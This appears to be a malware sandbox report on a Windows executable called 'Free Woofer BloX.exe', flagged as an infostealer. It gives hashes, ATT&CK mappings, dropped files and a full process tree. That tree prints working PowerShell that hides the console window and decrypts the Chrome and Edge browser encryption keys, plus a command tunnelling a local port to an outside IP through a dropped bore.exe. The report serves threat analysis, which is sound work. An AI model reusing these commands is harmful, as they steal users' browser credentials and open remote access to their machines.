5b4e3c99b1366492acdcac0ab08721125a1f29e60d654d7d26904fad6a28616f

Resubmissions

23/07/2023, 15:02

230723-settlaed65 7

23/07/2023, 14:39

230723-r1ar6sed22 7

Analysis

max time kernel
116s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
23/07/2023, 15:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Free Woofer BloX.exe
Size

39.2MB
MD5

793c4da2d66ae4a3175432265b716f3b
SHA1

87f69e5d036ec2d1dca2c7348b5d336d38b17d84
SHA256

5b4e3c99b1366492acdcac0ab08721125a1f29e60d654d7d26904fad6a28616f
SHA512

34702eaaf3530fcc065b5d3809cc7beb6c09c30abc248abc08c29247507dbec2fb47698d6a1d10045c2240eb7c6574ef3ae7acaba5224618873067681026765c
SSDEEP

393216:f1Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYfP:fMguj8Q4VfvUqFTrYPV

Score

7^/10

spyware stealer

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	Free Woofer BloX.exe

Executes dropped EXE 1 IoCs

pid	Process
5016	bore.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
1268	powershell.exe
4024	powershell.exe
1268	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
1268	powershell.exe
1268	powershell.exe
1268	powershell.exe
1268	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
3508	powershell.exe
3508	powershell.exe
3120	powershell.exe
3120	powershell.exe
3120	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeIncreaseQuotaPrivilege	1416	WMIC.exe
Token: SeSecurityPrivilege	1416	WMIC.exe
Token: SeTakeOwnershipPrivilege	1416	WMIC.exe
Token: SeLoadDriverPrivilege	1416	WMIC.exe
Token: SeSystemProfilePrivilege	1416	WMIC.exe
Token: SeSystemtimePrivilege	1416	WMIC.exe
Token: SeProfSingleProcessPrivilege	1416	WMIC.exe
Token: SeIncBasePriorityPrivilege	1416	WMIC.exe
Token: SeCreatePagefilePrivilege	1416	WMIC.exe
Token: SeBackupPrivilege	1416	WMIC.exe
Token: SeRestorePrivilege	1416	WMIC.exe
Token: SeShutdownPrivilege	1416	WMIC.exe
Token: SeDebugPrivilege	1416	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1416	WMIC.exe
Token: SeRemoteShutdownPrivilege	1416	WMIC.exe
Token: SeUndockPrivilege	1416	WMIC.exe
Token: SeManageVolumePrivilege	1416	WMIC.exe
Token: 33	1416	WMIC.exe
Token: 34	1416	WMIC.exe
Token: 35	1416	WMIC.exe
Token: 36	1416	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3288	WMIC.exe
Token: SeSecurityPrivilege	3288	WMIC.exe
Token: SeTakeOwnershipPrivilege	3288	WMIC.exe
Token: SeLoadDriverPrivilege	3288	WMIC.exe
Token: SeSystemProfilePrivilege	3288	WMIC.exe
Token: SeSystemtimePrivilege	3288	WMIC.exe
Token: SeProfSingleProcessPrivilege	3288	WMIC.exe
Token: SeIncBasePriorityPrivilege	3288	WMIC.exe
Token: SeCreatePagefilePrivilege	3288	WMIC.exe
Token: SeBackupPrivilege	3288	WMIC.exe
Token: SeRestorePrivilege	3288	WMIC.exe
Token: SeShutdownPrivilege	3288	WMIC.exe
Token: SeDebugPrivilege	3288	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3288	WMIC.exe
Token: SeRemoteShutdownPrivilege	3288	WMIC.exe
Token: SeUndockPrivilege	3288	WMIC.exe
Token: SeManageVolumePrivilege	3288	WMIC.exe
Token: 33	3288	WMIC.exe
Token: 34	3288	WMIC.exe
Token: 35	3288	WMIC.exe
Token: 36	3288	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4288	BackgroundTransferHost.exe
Token: SeSecurityPrivilege	4288	BackgroundTransferHost.exe
Token: SeTakeOwnershipPrivilege	4288	BackgroundTransferHost.exe
Token: SeLoadDriverPrivilege	4288	BackgroundTransferHost.exe
Token: SeSystemProfilePrivilege	4288	BackgroundTransferHost.exe
Token: SeSystemtimePrivilege	4288	BackgroundTransferHost.exe
Token: SeProfSingleProcessPrivilege	4288	BackgroundTransferHost.exe
Token: SeIncBasePriorityPrivilege	4288	BackgroundTransferHost.exe
Token: SeCreatePagefilePrivilege	4288	BackgroundTransferHost.exe
Token: SeBackupPrivilege	4288	BackgroundTransferHost.exe
Token: SeRestorePrivilege	4288	BackgroundTransferHost.exe
Token: SeShutdownPrivilege	4288	BackgroundTransferHost.exe
Token: SeDebugPrivilege	4288	BackgroundTransferHost.exe
Token: SeSystemEnvironmentPrivilege	4288	BackgroundTransferHost.exe
Token: SeRemoteShutdownPrivilege	4288	BackgroundTransferHost.exe
Token: SeUndockPrivilege	4288	BackgroundTransferHost.exe
Token: SeManageVolumePrivilege	4288	BackgroundTransferHost.exe
Token: 33	4288	BackgroundTransferHost.exe
Token: 34	4288	BackgroundTransferHost.exe
Token: 35	4288	BackgroundTransferHost.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 3204 wrote to memory of 4024	3204	Free Woofer BloX.exe	87
PID 3204 wrote to memory of 4024	3204	Free Woofer BloX.exe	87
PID 3204 wrote to memory of 1268	3204	Free Woofer BloX.exe	86
PID 3204 wrote to memory of 1268	3204	Free Woofer BloX.exe	86
PID 3204 wrote to memory of 4408	3204	Free Woofer BloX.exe	88
PID 3204 wrote to memory of 4408	3204	Free Woofer BloX.exe	88
PID 4408 wrote to memory of 748	4408	cmd.exe	89
PID 4408 wrote to memory of 748	4408	cmd.exe	89
PID 1268 wrote to memory of 1292	1268	powershell.exe	90
PID 1268 wrote to memory of 1292	1268	powershell.exe	90
PID 1292 wrote to memory of 2532	1292	csc.exe	91
PID 1292 wrote to memory of 2532	1292	csc.exe	91
PID 3204 wrote to memory of 1288	3204	Free Woofer BloX.exe	93
PID 3204 wrote to memory of 1288	3204	Free Woofer BloX.exe	93
PID 3204 wrote to memory of 4452	3204	Free Woofer BloX.exe	94
PID 3204 wrote to memory of 4452	3204	Free Woofer BloX.exe	94
PID 3204 wrote to memory of 1316	3204	Free Woofer BloX.exe	100
PID 3204 wrote to memory of 1316	3204	Free Woofer BloX.exe	100
PID 3204 wrote to memory of 2776	3204	Free Woofer BloX.exe	99
PID 3204 wrote to memory of 2776	3204	Free Woofer BloX.exe	99
PID 1288 wrote to memory of 2284	1288	cmd.exe	96
PID 1288 wrote to memory of 2284	1288	cmd.exe	96
PID 4452 wrote to memory of 3288	4452	cmd.exe	95
PID 4452 wrote to memory of 3288	4452	cmd.exe	95
PID 2776 wrote to memory of 1416	2776	cmd.exe	97
PID 2776 wrote to memory of 1416	2776	cmd.exe	97
PID 1316 wrote to memory of 4288	1316	cmd.exe	113
PID 1316 wrote to memory of 4288	1316	cmd.exe	113
PID 2284 wrote to memory of 5016	2284	cmd.exe	101
PID 2284 wrote to memory of 5016	2284	cmd.exe	101
PID 3204 wrote to memory of 3508	3204	Free Woofer BloX.exe	103
PID 3204 wrote to memory of 3508	3204	Free Woofer BloX.exe	103
PID 3204 wrote to memory of 3120	3204	Free Woofer BloX.exe	108
PID 3204 wrote to memory of 3120	3204	Free Woofer BloX.exe	108

C:\Users\Admin\AppData\Local\Temp\Free Woofer BloX.exe
"C:\Users\Admin\AppData\Local\Temp\Free Woofer BloX.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -c "$ShowWindowAsyncCode = '[DllImport(\"user32.dll\")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' $ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win32Functions -PassThru $hwnd = (Get-Process -PID $pid).MainWindowHandle if ($hwnd -ne [System.IntPtr]::Zero) { # When you got HWND of the console window: # (It would appear that Windows Console Host is the default terminal application) $ShowWindowAsync::ShowWindowAsync($hwnd, 0) } else { # When you failed to get HWND of the console window: # (It would appear that Windows Terminal is the default terminal application) # Mark the current console window with a unique string. $UniqueWindowTitle = New-Guid $Host.UI.RawUI.WindowTitle = $UniqueWindowTitle $StringBuilder = New-Object System.Text.StringBuilder 1024 # Search the process that has the window title generated above. $TerminalProcess = (Get-Process | Where-Object { $_.MainWindowTitle -eq $UniqueWindowTitle }) # Get the window handle of the terminal process. # Note that GetConsoleWindow() in Win32 API returns the HWND of # powershell.exe itself rather than the terminal process. # When you call ShowWindowAsync(HWND, 0) with the HWND from GetConsoleWindow(), # the Windows Terminal window will be just minimized rather than hidden. $hwnd = $TerminalProcess.MainWindowHandle if ($hwnd -ne [System.IntPtr]::Zero) { $ShowWindowAsync::ShowWindowAsync($hwnd, 0) } else { Write-Host \"Failed to hide the console window.\" } }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1268
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1ap1niuk\1ap1niuk.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1292
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD801.tmp" "c:\Users\Admin\AppData\Local\Temp\1ap1niuk\CSCC6BC34F65714B5086FF836FC4FE96F.TMP"
      4⤵
      PID:2532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -c "Get-Process | where {$_.Description -like '*Cpp_Runtime_Env*'} | select Description"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\REG.exe QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG.exe QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
    3⤵
    PID:748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "start /b cmd /c C:\Users\Admin\AppData\Local\Temp\bore.exe local 6801 --to 213.232.235.54 --secret pskandcodingguythekings"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1288
- - C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\bore.exe local 6801 --to 213.232.235.54 --secret pskandcodingguythekings
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2284
  - - C:\Users\Admin\AppData\Local\Temp\bore.exe
      C:\Users\Admin\AppData\Local\Temp\bore.exe local 6801 --to 213.232.235.54 --secret pskandcodingguythekings
      4⤵
      Executes dropped EXE
      PID:5016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get name"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic logicaldisk get name
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get name"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get name"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -c "Add-Type -Assembly System.Security;$ExtensionFile = \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\"; $jsondata = Get-Content -Raw -Path $ExtensionFile | ConvertFrom-Json; $encKey = [System.Convert]::FromBase64String($jsondata.os_crypt.encrypted_key.ToString()); $encKey = $encKey[5..$encKey.Length]; $decKey = [System.Security.Cryptography.ProtectedData]::Unprotect($encKey,$null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $body = $decKey -join \", \" | Out-String;echo $body;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -c "Add-Type -Assembly System.Security;$ExtensionFile = \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State\"; $jsondata = Get-Content -Raw -Path $ExtensionFile | ConvertFrom-Json; $encKey = [System.Convert]::FromBase64String($jsondata.os_crypt.encrypted_key.ToString()); $encKey = $encKey[5..$encKey.Length]; $decKey = [System.Security.Cryptography.ProtectedData]::Unprotect($encKey,$null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $body = $decKey -join \", \" | Out-String;echo $body;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3120

C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get name
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1416

C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get name
1⤵
PID:4288

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f380d62a69e1ea1237d8ae7153ed2d69

SHA1
b6c1bf4c5e995c070d542771a14abc6ae8d4f6be

SHA256
72af84db6a35b043619c568d82802c382e3c037ae0d6cc1c36c43d8795672447

SHA512
4afba6d4bbb7ee136c643930a807877c517a328377c8b23db019420047911ca72006c5becc393bc510a85444b7ceccaae6adf0d7cabff35b83b46f408ac5f544

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f380d62a69e1ea1237d8ae7153ed2d69

SHA1
b6c1bf4c5e995c070d542771a14abc6ae8d4f6be

SHA256
72af84db6a35b043619c568d82802c382e3c037ae0d6cc1c36c43d8795672447

SHA512
4afba6d4bbb7ee136c643930a807877c517a328377c8b23db019420047911ca72006c5becc393bc510a85444b7ceccaae6adf0d7cabff35b83b46f408ac5f544

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c6100bcd917544aa67fe81237a254433

SHA1
15930df4b0f5f8bc7bdea22c18e201ad8d116c8f

SHA256
4102ef841709d32b1cbe6c19e3dc147c9c76e3bd10fe37f9444b12072d4f451f

SHA512
cc7d8e2fe03a91e749761c42d816892b460941743825cea6ebd57510dabb4fb2a0024c2f459a58f8e649e3e75dd4f6ffad003c268224cb8f374ca52b8fbd3a8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1ap1niuk\1ap1niuk.dll

Filesize
3KB

MD5
95e1fb7062ab19fbb718f2d52c950c79

SHA1
dca32afc19cd664b507247fbda2a59f6ebf572bb

SHA256
ec009ff90b4ee0c1f249263f14c8d974e45eb883abedefc0df8d6b9107b9bb19

SHA512
1c32ad61edf8b2be43318f62a346ae60d9844dded34dda70ffa6c484154323f6973112f69cfc77cf7cc79b5c079d6079fadc8ba3a9d531bde2657e30eddb9752

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD801.tmp

Filesize
1KB

MD5
0fa4b645c032ac34e6f587ceed9d13ca

SHA1
f5e3ef8a14062c30206be5bb8e649600c303f77c

SHA256
384c990a60df082e322dfb5869845d8eda340a4a583e1381db81c7f028fc3d2b

SHA512
e0a3c6f549ad43d241515c5f6bd909e98f53cf0b108b9aab9260e5e28f077a316b4e696b4ef55952a27b4be8ec614cd2b66e6a2b0b3a1bcd5530e2ef52abdc49

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pg5h0wne.urd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bore.exe

Filesize
1.5MB

MD5
9528c4a629beb2a08cf8d8d2afd1c225

SHA1
3aa4e4186ae41e84f744767989368c0f81efe43b

SHA256
0bfd38c590e56144552813c3d97c52093544d0a031c42666368424b3d23a9405

SHA512
8647ef473adace9c82e4ff5cd4890dcd2e3e28a9d6bb489dbbaa2d9c259792837ef94374835dc099f4312a8f1e8c22d7b7bc3546470835f7a6192ebf66cb7dad

Download Submit
C:\Users\Admin\AppData\Local\Temp\bore.exe

Filesize
1.5MB

MD5
9528c4a629beb2a08cf8d8d2afd1c225

SHA1
3aa4e4186ae41e84f744767989368c0f81efe43b

SHA256
0bfd38c590e56144552813c3d97c52093544d0a031c42666368424b3d23a9405

SHA512
8647ef473adace9c82e4ff5cd4890dcd2e3e28a9d6bb489dbbaa2d9c259792837ef94374835dc099f4312a8f1e8c22d7b7bc3546470835f7a6192ebf66cb7dad

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
8737e5a90e27b88876ffcd81b31dc5ee

SHA1
1b88f3f2818a960bece419e11ea3312e33d6afa1

SHA256
0cef9ba80eb81105f06f2147edd746f08382ff94d1d782bcaa7bc4bf63c094d7

SHA512
182112b0d11602df51a7309472ddc051bc268d13a84e6613cf6e8ec1b4a2cecea7618f1831c805750c40bab982967496e9653e992421590e71f8494c8c3884a1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
df9f955c9dd70339247e7c17c3fb3fbf

SHA1
3f06e8c934b1ae857bc35262dfbf1cd875059676

SHA256
c898c64b1ed5b3c1085a1f6c8c11198b07113e0971de8dd5d0b94d02567e49e4

SHA512
2ff7f25c68bd5c3f82cac5cfe76f5ec0bc0252b2fe51a9021324462b86ad6a54e01803056993836fb232987ee1d5ef8eafa23e140097278e622e470cd7f9bf3f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
df9f955c9dd70339247e7c17c3fb3fbf

SHA1
3f06e8c934b1ae857bc35262dfbf1cd875059676

SHA256
c898c64b1ed5b3c1085a1f6c8c11198b07113e0971de8dd5d0b94d02567e49e4

SHA512
2ff7f25c68bd5c3f82cac5cfe76f5ec0bc0252b2fe51a9021324462b86ad6a54e01803056993836fb232987ee1d5ef8eafa23e140097278e622e470cd7f9bf3f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
b8dafc81e03cffdd16bd2fb71bac5196

SHA1
51d624ee236967834d76a511249f0be421b0c5f8

SHA256
40fa3f5ca66bb8412e3717783f85bc4bc44c7a4e71a1fac0d73c4a1644b7780f

SHA512
f8eec9e5b8d6afa66ea458443111ffad49de0e68f0b12b2e85adafff8cfd8e93c758d7d7957d4c413376ea36989af11922d7075fbe5cbd4039d4f35922c29bdf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
b8dafc81e03cffdd16bd2fb71bac5196

SHA1
51d624ee236967834d76a511249f0be421b0c5f8

SHA256
40fa3f5ca66bb8412e3717783f85bc4bc44c7a4e71a1fac0d73c4a1644b7780f

SHA512
f8eec9e5b8d6afa66ea458443111ffad49de0e68f0b12b2e85adafff8cfd8e93c758d7d7957d4c413376ea36989af11922d7075fbe5cbd4039d4f35922c29bdf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZWTW6E8AXZQE00X4VPUQ.temp

Filesize
6KB

MD5
b0324f552d6cff9825762af5faa3ee7b

SHA1
22aa2afd124e214ebd1a15915c9d3710859d1969

SHA256
5639315e828bcc3e55a6187dca48a06d3ef36f6abb889440b7c34057f8d37e2e

SHA512
5f1d53181350ddf64ee00bce57db1fa790442a2b70a4e072c3d105c7e00cfcc308385d4b0576b6cb451e6671bbc249783a4cc7878dc2bed262cf51118bfd3730

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1ap1niuk\1ap1niuk.0.cs

Filesize
237B

MD5
a6e80541a483188dbce2f3d843fcbe4d

SHA1
a1f2e13a3314ab6a676751936c7b3b9a9fb9103e

SHA256
d5b10c7f3cbb62cbf4772a7b178c578c8abaa3fe9a7420decbff18d81f08ccd9

SHA512
6f60f86688dc256a668b6e3e8529820cf8253c47c6a1126f3097576f36b5c220f32febabce65e25dfa5b824dc2200b7ca7aca2c3bc3b8314cadb734a589b6337

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1ap1niuk\1ap1niuk.cmdline

Filesize
369B

MD5
ea236d9869e518689f64a71296c3676f

SHA1
ed558c90a34c30f32ac01bece6fc664c561a1c44

SHA256
03a4901a83895c457501f4526be6248bbb63d75dc9156d0d89f83b49f33c40f0

SHA512
0b68c989492172b7210cf9a5495fd71a5e86d0d6652ff23488c7c76f07428e4671c006e5635396d23092eec8acb37f7c315ed622088a969107c042f919d7bc1c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1ap1niuk\CSCC6BC34F65714B5086FF836FC4FE96F.TMP

Filesize
652B

MD5
0259193bdb7e0cfab9008c0c2ca5071f

SHA1
6ed194238247a3556393ae069d8266d99c86e145

SHA256
a0f21b75a278abc0b7db0b1c3775494aa3f93c489957211f9ec31f46760c25f3

SHA512
71a278bd6fa8200972502fcf17e71df63befc97dcb039f25420a725dbee02d1f0eaee3448109e2f1ae210c9603de733a7346919df36d61c647e0777c056877c1

Download Submit
memory/1268-153-0x0000018C70340000-0x0000018C70350000-memory.dmp

Filesize
64KB

Download
memory/1268-181-0x0000018C70340000-0x0000018C70350000-memory.dmp

Filesize
64KB

Download
memory/1268-166-0x0000018C70340000-0x0000018C70350000-memory.dmp

Filesize
64KB

Download
memory/1268-146-0x0000018C725D0000-0x0000018C725F2000-memory.dmp

Filesize
136KB

Download
memory/1268-185-0x00007FFA3B810000-0x00007FFA3C2D1000-memory.dmp

Filesize
10.8MB

Download
memory/1268-152-0x00007FFA3B810000-0x00007FFA3C2D1000-memory.dmp

Filesize
10.8MB

Download
memory/3120-255-0x00007FFA3B750000-0x00007FFA3C211000-memory.dmp

Filesize
10.8MB

Download
memory/3120-252-0x000001FCF1550000-0x000001FCF1560000-memory.dmp

Filesize
64KB

Download
memory/3120-241-0x000001FCF1550000-0x000001FCF1560000-memory.dmp

Filesize
64KB

Download
memory/3120-240-0x000001FCF1550000-0x000001FCF1560000-memory.dmp

Filesize
64KB

Download
memory/3120-239-0x00007FFA3B750000-0x00007FFA3C211000-memory.dmp

Filesize
10.8MB

Download
memory/3508-207-0x000001BFE2980000-0x000001BFE2990000-memory.dmp

Filesize
64KB

Download
memory/3508-219-0x000001BFFDEC0000-0x000001BFFE3E8000-memory.dmp

Filesize
5.2MB

Download
memory/3508-222-0x00007FFA3B800000-0x00007FFA3C2C1000-memory.dmp

Filesize
10.8MB

Download
memory/3508-218-0x000001BFFD7C0000-0x000001BFFD982000-memory.dmp

Filesize
1.8MB

Download
memory/3508-217-0x000001BFFD5A0000-0x000001BFFD5F0000-memory.dmp

Filesize
320KB

Download
memory/3508-206-0x000001BFE2980000-0x000001BFE2990000-memory.dmp

Filesize
64KB

Download
memory/3508-205-0x00007FFA3B800000-0x00007FFA3C2C1000-memory.dmp

Filesize
10.8MB

Download
memory/4024-163-0x00007FFA3B810000-0x00007FFA3C2D1000-memory.dmp

Filesize
10.8MB

Download
memory/4024-165-0x00000176F8390000-0x00000176F83A0000-memory.dmp

Filesize
64KB

Download
memory/4024-164-0x00000176F8390000-0x00000176F83A0000-memory.dmp

Filesize
64KB

Download
memory/4024-190-0x00007FFA3B810000-0x00007FFA3C2D1000-memory.dmp

Filesize
10.8MB

Download